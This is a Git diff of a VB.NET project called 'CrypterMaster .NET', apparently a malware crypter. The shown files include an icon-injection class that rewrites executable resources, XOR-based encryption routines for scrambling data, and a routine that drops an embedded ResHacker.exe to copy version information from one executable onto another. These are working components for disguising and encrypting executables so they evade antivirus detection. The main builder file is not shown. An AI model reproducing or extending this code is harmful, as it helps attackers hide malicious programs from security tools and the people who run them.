MsgBox(ex.Message, MsgBoxStyle.Critical, "Error en tiempo de ejecución")
|
||||
progressCrear.Value = 0
|
||||
End Try
|
||||
End Sub
|
||||
End Class
|
||||
+38
@@ -0,0 +1,38 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.18444
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
|
||||
Namespace My
|
||||
|
||||
'NOTE: This file is auto-generated; do not modify it directly. To make changes,
|
||||
' or if you encounter build errors in this file, go to the Project Designer
|
||||
' (go to Project Properties or double-click the My Project node in
|
||||
' Solution Explorer), and make changes on the Application tab.
|
||||
'
|
||||
Partial Friend Class MyApplication
|
||||
|
||||
<Global.System.Diagnostics.DebuggerStepThroughAttribute()> _
|
||||
Public Sub New()
|
||||
MyBase.New(Global.Microsoft.VisualBasic.ApplicationServices.AuthenticationMode.Windows)
|
||||
Me.IsSingleInstance = true
|
||||
Me.EnableVisualStyles = true
|
||||
Me.SaveMySettingsOnExit = true
|
||||
Me.ShutDownStyle = Global.Microsoft.VisualBasic.ApplicationServices.ShutdownMode.AfterMainFormCloses
|
||||
End Sub
|
||||
|
||||
<Global.System.Diagnostics.DebuggerStepThroughAttribute()> _
|
||||
Protected Overrides Sub OnCreateMainForm()
|
||||
Me.MainForm = Global.CrypterMaster.GUI
|
||||
End Sub
|
||||
End Class
|
||||
End Namespace
|
||||
@@ -0,0 +1,10 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||||
<MySubMain>true</MySubMain>
|
||||
<MainForm>GUI</MainForm>
|
||||
<SingleInstance>true</SingleInstance>
|
||||
<ShutdownMode>0</ShutdownMode>
|
||||
<EnableVisualStyles>true</EnableVisualStyles>
|
||||
<AuthenticationMode>0</AuthenticationMode>
|
||||
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
|
||||
</MyApplicationData>
|
||||
@@ -0,0 +1,35 @@
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
Imports System.Runtime.InteropServices
|
||||
|
||||
' La información general sobre un ensamblado se controla mediante el siguiente
|
||||
' conjunto de atributos. Cambie estos atributos para modificar la información
|
||||
' asociada con un ensamblado.
|
||||
|
||||
' Revisar los valores de los atributos del ensamblado
|
||||
|
||||
<Assembly: AssemblyTitle("CrypterMaster .NET")>
|
||||
<Assembly: AssemblyDescription("")>
|
||||
<Assembly: AssemblyCompany("")>
|
||||
<Assembly: AssemblyProduct("CrypterMaster .NET")>
|
||||
<Assembly: AssemblyCopyright("Copyright © chequinho 2014")>
|
||||
<Assembly: AssemblyTrademark("")>
|
||||
|
||||
<Assembly: ComVisible(False)>
|
||||
|
||||
'El siguiente GUID sirve como identificador de typelib si este proyecto se expone a COM
|
||||
<Assembly: Guid("63a2c87d-1855-4846-a649-a83698cf4326")>
|
||||
|
||||
' La información de versión de un ensamblado consta de los cuatro valores siguientes:
|
||||
'
|
||||
' Versión principal
|
||||
' Versión secundaria
|
||||
' Número de compilación
|
||||
' Revisión
|
||||
'
|
||||
' Puede especificar todos los valores o usar los valores predeterminados de número de compilación y de revisión
|
||||
' mediante el asterisco ('*'), como se muestra a continuación:
|
||||
' <Assembly: AssemblyVersion("1.0.*")>
|
||||
|
||||
<Assembly: AssemblyVersion("1.0.0.0")>
|
||||
<Assembly: AssemblyFileVersion("1.0.0.0")>
|
||||
+73
@@ -0,0 +1,73 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.18444
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
|
||||
Namespace My.Resources
|
||||
|
||||
'This class was auto-generated by the StronglyTypedResourceBuilder
|
||||
'class via a tool like ResGen or Visual Studio.
|
||||
'To add or remove a member, edit your .ResX file then rerun ResGen
|
||||
'with the /str option, or rebuild your VS project.
|
||||
'''<summary>
|
||||
''' A strongly-typed resource class, for looking up localized strings, etc.
|
||||
'''</summary>
|
||||
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
|
||||
Friend Module Resources
|
||||
|
||||
Private resourceMan As Global.System.Resources.ResourceManager
|
||||
|
||||
Private resourceCulture As Global.System.Globalization.CultureInfo
|
||||
|
||||
'''<summary>
|
||||
''' Returns the cached ResourceManager instance used by this class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
|
||||
Get
|
||||
If Object.ReferenceEquals(resourceMan, Nothing) Then
|
||||
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("CrypterMaster.Resources", GetType(Resources).Assembly)
|
||||
resourceMan = temp
|
||||
End If
|
||||
Return resourceMan
|
||||
End Get
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Overrides the current thread's CurrentUICulture property for all
|
||||
''' resource lookups using this strongly typed resource class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend Property Culture() As Global.System.Globalization.CultureInfo
|
||||
Get
|
||||
Return resourceCulture
|
||||
End Get
|
||||
Set
|
||||
resourceCulture = value
|
||||
End Set
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Looks up a localized resource of type System.Byte[].
|
||||
'''</summary>
|
||||
Friend ReadOnly Property ResHacker() As Byte()
|
||||
Get
|
||||
Dim obj As Object = ResourceManager.GetObject("ResHacker", resourceCulture)
|
||||
Return CType(obj,Byte())
|
||||
End Get
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,124 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<root>
|
||||
<!--
|
||||
Microsoft ResX Schema
|
||||
|
||||
Version 2.0
|
||||
|
||||
The primary goals of this format is to allow a simple XML format
|
||||
that is mostly human readable. The generation and parsing of the
|
||||
various data types are done through the TypeConverter classes
|
||||
associated with the data types.
|
||||
|
||||
Example:
|
||||
|
||||
... ado.net/XML headers & schema ...
|
||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
||||
<resheader name="version">2.0</resheader>
|
||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
||||
</data>
|
||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
||||
<comment>This is a comment</comment>
|
||||
</data>
|
||||
|
||||
There are any number of "resheader" rows that contain simple
|
||||
name/value pairs.
|
||||
|
||||
Each data row contains a name, and value. The row also contains a
|
||||
type or mimetype. Type corresponds to a .NET class that support
|
||||
text/value conversion through the TypeConverter architecture.
|
||||
Classes that don't support this are serialized and stored with the
|
||||
mimetype set.
|
||||
|
||||
The mimetype is used for serialized objects, and tells the
|
||||
ResXResourceReader how to depersist the object. This is currently not
|
||||
extensible. For a given mimetype the value must be set accordingly:
|
||||
|
||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
||||
that the ResXResourceWriter will generate, however the reader can
|
||||
read any of the formats listed below.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.binary.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.soap.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
||||
value : The object must be serialized into a byte array
|
||||
: using a System.ComponentModel.TypeConverter
|
||||
: and then encoded with base64 encoding.
|
||||
-->
|
||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
||||
<xsd:element name="root" msdata:IsDataSet="true">
|
||||
<xsd:complexType>
|
||||
<xsd:choice maxOccurs="unbounded">
|
||||
<xsd:element name="metadata">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
||||
<xsd:attribute name="type" type="xsd:string" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
||||
<xsd:attribute ref="xml:space" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="assembly">
|
||||
<xsd:complexType>
|
||||
<xsd:attribute name="alias" type="xsd:string" />
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="data">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
||||
<xsd:attribute ref="xml:space" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="resheader">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:choice>
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:schema>
|
||||
<resheader name="resmimetype">
|
||||
<value>text/microsoft-resx</value>
|
||||
</resheader>
|
||||
<resheader name="version">
|
||||
<value>2.0</value>
|
||||
</resheader>
|
||||
<resheader name="reader">
|
||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<resheader name="writer">
|
||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
|
||||
<data name="ResHacker" type="System.Resources.ResXFileRef, System.Windows.Forms">
|
||||
<value>..\Resources\ResHacker.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</data>
|
||||
</root>
|
||||
+73
@@ -0,0 +1,73 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.18444
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0"), _
|
||||
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Partial Friend NotInheritable Class MySettings
|
||||
Inherits Global.System.Configuration.ApplicationSettingsBase
|
||||
|
||||
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
|
||||
|
||||
#Region "My.Settings Auto-Save Functionality"
|
||||
#If _MyType = "WindowsForms" Then
|
||||
Private Shared addedHandler As Boolean
|
||||
|
||||
Private Shared addedHandlerLockObject As New Object
|
||||
|
||||
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Private Shared Sub AutoSaveSettings(ByVal sender As Global.System.Object, ByVal e As Global.System.EventArgs)
|
||||
If My.Application.SaveMySettingsOnExit Then
|
||||
My.Settings.Save()
|
||||
End If
|
||||
End Sub
|
||||
#End If
|
||||
#End Region
|
||||
|
||||
Public Shared ReadOnly Property [Default]() As MySettings
|
||||
Get
|
||||
|
||||
#If _MyType = "WindowsForms" Then
|
||||
If Not addedHandler Then
|
||||
SyncLock addedHandlerLockObject
|
||||
If Not addedHandler Then
|
||||
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
|
||||
addedHandler = True
|
||||
End If
|
||||
End SyncLock
|
||||
End If
|
||||
#End If
|
||||
Return defaultInstance
|
||||
End Get
|
||||
End Property
|
||||
End Class
|
||||
End Namespace
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
|
||||
Friend Module MySettingsProperty
|
||||
|
||||
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
|
||||
Friend ReadOnly Property Settings() As Global.CrypterMaster.My.MySettings
|
||||
Get
|
||||
Return Global.CrypterMaster.My.MySettings.Default
|
||||
End Get
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,7 @@
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
|
||||
<Profiles>
|
||||
<Profile Name="(Default)" />
|
||||
</Profiles>
|
||||
<Settings />
|
||||
</SettingsFile>
|
||||
Binary file not shown.
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,151 @@
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
Option Infer On
|
||||
Imports System.Runtime.InteropServices
|
||||
Imports System.Security
|
||||
Public Class IconChanger
|
||||
<SuppressUnmanagedCodeSecurity()> _
|
||||
Private Class NativeMethods
|
||||
<DllImport("kernel32")> _
|
||||
Public Shared Function BeginUpdateResource( _
|
||||
ByVal fileName As String, _
|
||||
<MarshalAs(UnmanagedType.Bool)> ByVal deleteExistingResources As Boolean) As IntPtr
|
||||
End Function
|
||||
<DllImport("kernel32")> _
|
||||
Public Shared Function UpdateResource( _
|
||||
ByVal hUpdate As IntPtr, _
|
||||
ByVal type As IntPtr, _
|
||||
ByVal name As IntPtr, _
|
||||
ByVal language As Short, _
|
||||
<MarshalAs(UnmanagedType.LPArray, SizeParamIndex:=5)> _
|
||||
ByVal data() As Byte, _
|
||||
ByVal dataSize As Integer) As <MarshalAs(UnmanagedType.Bool)> Boolean
|
||||
End Function
|
||||
<DllImport("kernel32")> _
|
||||
Public Shared Function EndUpdateResource( _
|
||||
ByVal hUpdate As IntPtr, _
|
||||
<MarshalAs(UnmanagedType.Bool)> ByVal discard As Boolean) As <MarshalAs(UnmanagedType.Bool)> Boolean
|
||||
End Function
|
||||
End Class
|
||||
<StructLayout(LayoutKind.Sequential)> _
|
||||
Private Structure ICONDIR
|
||||
Public Reserved As UShort
|
||||
Public Type As UShort
|
||||
Public Count As UShort
|
||||
End Structure
|
||||
<StructLayout(LayoutKind.Sequential)> _
|
||||
Private Structure ICONDIRENTRY
|
||||
Public Width As Byte
|
||||
Public Height As Byte
|
||||
Public ColorCount As Byte
|
||||
Public Reserved As Byte
|
||||
Public Planes As UShort
|
||||
Public BitCount As UShort
|
||||
Public BytesInRes As Integer
|
||||
Public ImageOffset As Integer
|
||||
End Structure
|
||||
<StructLayout(LayoutKind.Sequential)> _
|
||||
Private Structure BITMAPINFOHEADER
|
||||
Public Size As UInteger
|
||||
Public Width As Integer
|
||||
Public Height As Integer
|
||||
Public Planes As UShort
|
||||
Public BitCount As UShort
|
||||
Public Compression As UInteger
|
||||
Public SizeImage As UInteger
|
||||
Public XPelsPerMeter As Integer
|
||||
Public YPelsPerMeter As Integer
|
||||
Public ClrUsed As UInteger
|
||||
Public ClrImportant As UInteger
|
||||
End Structure
|
||||
<StructLayout(LayoutKind.Sequential, Pack:=2)> _
|
||||
Private Structure GRPICONDIRENTRY
|
||||
Public Width As Byte
|
||||
Public Height As Byte
|
||||
Public ColorCount As Byte
|
||||
Public Reserved As Byte
|
||||
Public Planes As UShort
|
||||
Public BitCount As UShort
|
||||
Public BytesInRes As Integer
|
||||
Public ID As UShort
|
||||
End Structure
|
||||
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String)
|
||||
InjectIcon(exeFileName, iconFileName, 1, 1)
|
||||
End Sub
|
||||
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String, ByVal iconGroupID As UInteger, ByVal iconBaseID As UInteger)
|
||||
Const RT_ICON As UInteger = 3UI
|
||||
Const RT_GROUP_ICON As UInteger = 14UI
|
||||
Dim iconFile As IconFile = iconFile.FromFile(iconFileName)
|
||||
Dim hUpdate = NativeMethods.BeginUpdateResource(exeFileName, False)
|
||||
Dim data = iconFile.CreateIconGroupData(iconBaseID)
|
||||
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_GROUP_ICON), New IntPtr(iconGroupID), 0, data, data.Length)
|
||||
For i = 0 To iconFile.ImageCount - 1
|
||||
Dim image = iconFile.ImageData(i)
|
||||
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_ICON), New IntPtr(iconBaseID + i), 0, image, image.Length)
|
||||
Next
|
||||
NativeMethods.EndUpdateResource(hUpdate, False)
|
||||
End Sub
|
||||
Private Class IconFile
|
||||
Private iconDir As New ICONDIR
|
||||
Private iconEntry() As ICONDIRENTRY
|
||||
Private iconImage()() As Byte
|
||||
Public ReadOnly Property ImageCount() As Integer
|
||||
Get
|
||||
Return iconDir.Count
|
||||
End Get
|
||||
End Property
|
||||
Public ReadOnly Property ImageData(ByVal index As Integer) As Byte()
|
||||
Get
|
||||
Return iconImage(index)
|
||||
End Get
|
||||
End Property
|
||||
Private Sub New()
|
||||
End Sub
|
||||
Public Shared Function FromFile(ByVal filename As String) As IconFile
|
||||
Dim instance As New IconFile
|
||||
Dim fileBytes() As Byte = IO.File.ReadAllBytes(filename)
|
||||
Dim pinnedBytes = GCHandle.Alloc(fileBytes, GCHandleType.Pinned)
|
||||
instance.iconDir = DirectCast(Marshal.PtrToStructure(pinnedBytes.AddrOfPinnedObject, GetType(ICONDIR)), ICONDIR)
|
||||
instance.iconEntry = New ICONDIRENTRY(instance.iconDir.Count - 1) {}
|
||||
instance.iconImage = New Byte(instance.iconDir.Count - 1)() {}
|
||||
Dim offset = Marshal.SizeOf(instance.iconDir)
|
||||
Dim iconDirEntryType = GetType(ICONDIRENTRY)
|
||||
Dim size = Marshal.SizeOf(iconDirEntryType)
|
||||
For i = 0 To instance.iconDir.Count - 1
|
||||
Dim entry = DirectCast(Marshal.PtrToStructure(New IntPtr(pinnedBytes.AddrOfPinnedObject.ToInt64 + offset), iconDirEntryType), ICONDIRENTRY)
|
||||
instance.iconEntry(i) = entry
|
||||
instance.iconImage(i) = New Byte(entry.BytesInRes - 1) {}
|
||||
Buffer.BlockCopy(fileBytes, entry.ImageOffset, instance.iconImage(i), 0, entry.BytesInRes)
|
||||
offset += size
|
||||
Next
|
||||
pinnedBytes.Free()
|
||||
Return instance
|
||||
End Function
|
||||
Public Function CreateIconGroupData(ByVal iconBaseID As UInteger) As Byte()
|
||||
Dim sizeOfIconGroupData As Integer = Marshal.SizeOf(GetType(ICONDIR)) + Marshal.SizeOf(GetType(GRPICONDIRENTRY)) * ImageCount
|
||||
Dim data(sizeOfIconGroupData - 1) As Byte
|
||||
Dim pinnedData = GCHandle.Alloc(data, GCHandleType.Pinned)
|
||||
Marshal.StructureToPtr(iconDir, pinnedData.AddrOfPinnedObject, False)
|
||||
Dim offset = Marshal.SizeOf(iconDir)
|
||||
For i = 0 To ImageCount - 1
|
||||
Dim grpEntry As New GRPICONDIRENTRY
|
||||
Dim bitmapheader As New BITMAPINFOHEADER
|
||||
Dim pinnedBitmapInfoHeader = GCHandle.Alloc(bitmapheader, GCHandleType.Pinned)
|
||||
Marshal.Copy(ImageData(i), 0, pinnedBitmapInfoHeader.AddrOfPinnedObject, Marshal.SizeOf(GetType(BITMAPINFOHEADER)))
|
||||
pinnedBitmapInfoHeader.Free()
|
||||
grpEntry.Width = iconEntry(i).Width
|
||||
grpEntry.Height = iconEntry(i).Height
|
||||
grpEntry.ColorCount = iconEntry(i).ColorCount
|
||||
grpEntry.Reserved = iconEntry(i).Reserved
|
||||
grpEntry.Planes = bitmapheader.Planes
|
||||
grpEntry.BitCount = bitmapheader.BitCount
|
||||
grpEntry.BytesInRes = iconEntry(i).BytesInRes
|
||||
grpEntry.ID = CType(iconBaseID + i, UShort)
|
||||
Marshal.StructureToPtr(grpEntry, New IntPtr(pinnedData.AddrOfPinnedObject.ToInt64 + offset), False)
|
||||
offset += Marshal.SizeOf(GetType(GRPICONDIRENTRY))
|
||||
Next
|
||||
pinnedData.Free()
|
||||
Return data
|
||||
End Function
|
||||
End Class
|
||||
End Class
|
||||
@@ -0,0 +1,128 @@
|
||||
Imports System.Text
|
||||
Imports System.IO
|
||||
Imports System.Reflection
|
||||
Imports System.Threading
|
||||
|
||||
Module mFunciones
|
||||
|
||||
Public Myself As String = Assembly.GetExecutingAssembly().Location
|
||||
Public FOLDER_MYSELF As String = Path.GetDirectoryName(Myself)
|
||||
|
||||
Public Function getKey(Longitud As Long) As String
|
||||
Dim Letters As New List(Of Integer)
|
||||
For i As Integer = 48 To 57
|
||||
Letters.Add(i)
|
||||
Next
|
||||
For i As Integer = 97 To 122
|
||||
Letters.Add(i)
|
||||
Next
|
||||
For i As Integer = 65 To 90
|
||||
Letters.Add(i)
|
||||
Next
|
||||
Dim Rnd As New Random
|
||||
Dim SB As New System.Text.StringBuilder
|
||||
Dim Temp As Integer
|
||||
For count As Integer = 1 To Longitud
|
||||
Temp = Rnd.Next(0, Letters.Count)
|
||||
SB.Append(Chr(Letters(Temp)))
|
||||
Next
|
||||
Return SB.ToString
|
||||
End Function
|
||||
|
||||
Public Function Stairs(ByVal Data As String, ByVal Key As String, Optional ByVal ExtraRounds As UInteger = 0) As String
|
||||
Dim buff() As Byte = Stairs(Encoding.Default.GetBytes(Data), Encoding.Default.GetBytes(Key), ExtraRounds)
|
||||
Stairs = Encoding.Default.GetString(buff)
|
||||
Erase buff
|
||||
End Function
|
||||
|
||||
Public Function Stairs(ByRef Data() As Byte, ByVal Key() As Byte, Optional ByVal ExtraRounds As UInteger = 0) As Byte()
|
||||
Array.Resize(Data, Data.Length + 1)
|
||||
Data(Data.Length - 1) = Convert.ToByte(New Random().Next(1, 255))
|
||||
For i = (Data.Length - 1) * (ExtraRounds + 1) To 0 Step -1
|
||||
Data(i Mod Data.Length) = CByte(CInt((Data(i Mod Data.Length)) + CInt(Data((i + 1) Mod Data.Length))) Mod 256) Xor Key(i Mod Key.Length)
|
||||
Next
|
||||
Return Data
|
||||
End Function
|
||||
|
||||
Public Function Unknown(ByVal sString As String, ByVal sKD As String) As String
|
||||
Dim i As Long, k As Long
|
||||
Rnd(-1)
|
||||
Randomize(sKD.Length)
|
||||
For k = 1 To sKD.Length
|
||||
i += (((k Mod 256) Xor Asc(Mid(sKD, k, 1))) Xor Fix(256 * Rnd()))
|
||||
Application.DoEvents()
|
||||
Next k
|
||||
Rnd(-1)
|
||||
Randomize(i)
|
||||
For k = 1 To sString.Length
|
||||
Mid(sString, k, 1) = Chr(Fix(256 * Rnd()) Xor Asc(Mid(sString, k, 1)))
|
||||
Application.DoEvents()
|
||||
Next k
|
||||
Return sString
|
||||
End Function
|
||||
|
||||
Public Function ExtStr(cadena As String, Opt As Long, Optional dirChar As String = "\") As String
|
||||
Dim FullName As String
|
||||
FullName = Mid$(cadena, InStrRev(cadena, dirChar) + 1)
|
||||
Select Case Opt
|
||||
Case 1
|
||||
'Nombre
|
||||
ExtStr = Mid$(FullName, 1, InStrRev(FullName, ".") - 1)
|
||||
Case 2
|
||||
'Extension
|
||||
ExtStr = "." & Mid$(FullName, InStrRev(FullName, ".") + 1)
|
||||
Case 3
|
||||
'Nombre + Extension
|
||||
ExtStr = FullName
|
||||
Case Else
|
||||
ExtStr = cadena
|
||||
End Select
|
||||
End Function
|
||||
|
||||
Public Function ReadFile(sFilePath As String) As String
|
||||
Try
|
||||
Dim FF As Integer
|
||||
FF = FreeFile()
|
||||
FileOpen(FF, sFilePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
|
||||
ReadFile = New String(Chr(0), FileLen(sFilePath))
|
||||
FileGet(FF, ReadFile)
|
||||
FileClose(FF)
|
||||
Catch ex As Exception
|
||||
Return ""
|
||||
End Try
|
||||
End Function
|
||||
|
||||
Public Sub WriteFile(sPath As String, sData As String)
|
||||
Dim FF As Integer
|
||||
FF = FreeFile()
|
||||
FileOpen(FF, sPath, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
|
||||
FilePut(FF, sData)
|
||||
FileClose(FF)
|
||||
End Sub
|
||||
|
||||
Public Sub WriteFile(sPath As String, sData() As Byte)
|
||||
Dim FF As Integer
|
||||
FF = FreeFile()
|
||||
FileOpen(FF, sPath, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
|
||||
FilePut(FF, sData)
|
||||
FileClose(FF)
|
||||
End Sub
|
||||
|
||||
Public Sub cloneInfo(sourceFile As String, destFile As String)
|
||||
Dim resHacker() As Byte = My.Resources.ResHacker
|
||||
Dim resHackerPath As String = FOLDER_MYSELF & "\ResHacker.exe"
|
||||
WriteFile(resHackerPath, resHacker)
|
||||
Thread.Sleep(1000)
|
||||
Application.DoEvents()
|
||||
Shell(resHackerPath & " -extract " & sourceFile & ", " & FOLDER_MYSELF & "\replaceResource.res" & ", " & "versionInfo, 1,")
|
||||
Shell(resHackerPath & " -delete " & destFile & ", " & destFile & ", " & "versionInfo, 1,")
|
||||
Shell(resHackerPath & " -addoverwrite " & destFile & ", " & destFile & ", " & FOLDER_MYSELF & "\replaceResource.res" & ", " & "versionInfo, 1,")
|
||||
Thread.Sleep(1000)
|
||||
Application.DoEvents()
|
||||
My.Computer.FileSystem.DeleteFile(FOLDER_MYSELF & "\replaceResource.res")
|
||||
My.Computer.FileSystem.DeleteFile(FOLDER_MYSELF & "\ResHacker.ini")
|
||||
My.Computer.FileSystem.DeleteFile(FOLDER_MYSELF & "\ResHacker.log")
|
||||
My.Computer.FileSystem.DeleteFile(resHackerPath)
|
||||
End Sub
|
||||
|
||||
End Module
|
||||
Binary file not shown.
|
After Width: | Height: | Size: 97 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 18 KiB |
Reference in New Issue
Block a user